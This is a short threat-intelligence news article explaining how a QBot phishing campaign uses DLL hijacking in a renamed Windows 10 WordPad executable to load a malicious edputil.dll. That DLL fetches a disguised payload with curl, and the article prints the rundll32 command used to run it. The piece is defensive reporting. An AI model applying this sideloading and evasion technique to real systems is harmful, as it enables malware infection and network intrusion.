QBot malware abuses Windows WordPad EXE to infect devices

The QBot malware campaign has begun to infect PCs. By exploiting a DLL hijacking hole in the Windows 10 WordPad application. Utilizing the legal program to avoid detection by security tools.

A DLL is a library file containing functions that can be used by more than one program at the same time. When an application is launched, it will attempt to load any required DLLs.

It does this by searching through specific Windows folders for the DLL and, when found, loads it. But, Windows applications will focus on DLLs in the same folder as the executable. And loading them before all others.

DLL hijacking is when a threat actor creates a malicious DLL of the same name as a legitimate one. Then places it in the early Windows search path, usually the same folder as the executable. When that executable is run, it will load the malware DLL rather than the legitimate one. Then execute any malicious commands within it.

QBot abuses WordPad DLL hijacking flaw

QBot, also known as Qakbot, is a Windows malware that started as a banking trojan. But evolved into a malware dropper. To get access to business networks, ransomware gangs have collaborated with the malware operation.

This QBot phishing campaign began abusing a DLL hijacking vulnerability in write.exe. The executable used to launch Wordpad in Windows.

The original phishing emails contain a link to download a file.

When a person clicks on the link it will download a random named ZIP archive from a remote host will be downloaded.

This ZIP file contains two files:

document.exe (the Windows 10 WordPad executable)

a DLL file named edputil.dll (used for the DLL hijack).

Contents of the zip file.

Contents of the downloaded ZIP file Source: BleepingComputer

You can see from the properties of the document.exe file, it is a renamed copy of the legitimate WordPad editor

Properties of the malware file.

Renamed Windows 10 WordPad executable Source: BleepingComputer

When document.exe is launched, it attempts to load a legitimate DLL file called edputil.dll. This file is located in the C:\Windows\System32 folder. 

Yet, when the executable attempts to load edputil.dll, it does not check for it in a specific folder. But will load any DLL of the same name found in the same folder as the document.exe executable.

This enables threat actors to execute DLL hijacking. This is done by building a malicious version of edputil.dll.. Then storing it in the same folder as document.exe so it is loaded instead.

Once the DLL is loaded, the malware uses C:\Windows\system32\curl.exe to download a file. The file downloaded is a DLL camouflaged as a PNG file from a remote host.

This PNG file (actually a DLL) is then executed using rundll32.exe with the following command:

rundll32 c:\users\public\default.png,print

QBot will now run in the background, stealing emails for use in further phishing attacks. It may also download other payloads, such as Cobalt Strike.

This device is then used as a foothold to spread throughout the network. Leading to corporate data theft and ransomware attacks.

The security software will not detect QBot as harmful. This is because most security software knows wordpad.exe is a safe file.

Yet, using curl.exe means that this infection method will only work on Windows 10 and later. As earlier operating system versions do not include the Curl program.

For the most part, this should not be an issue. Older versions of Windows have been phased out after reaching the end of support.

Now, the QBot operation has moved on to other infection methods in recent weeks. But it is not uncommon for them to switch to previous tactics in later campaigns.

Leave a Comment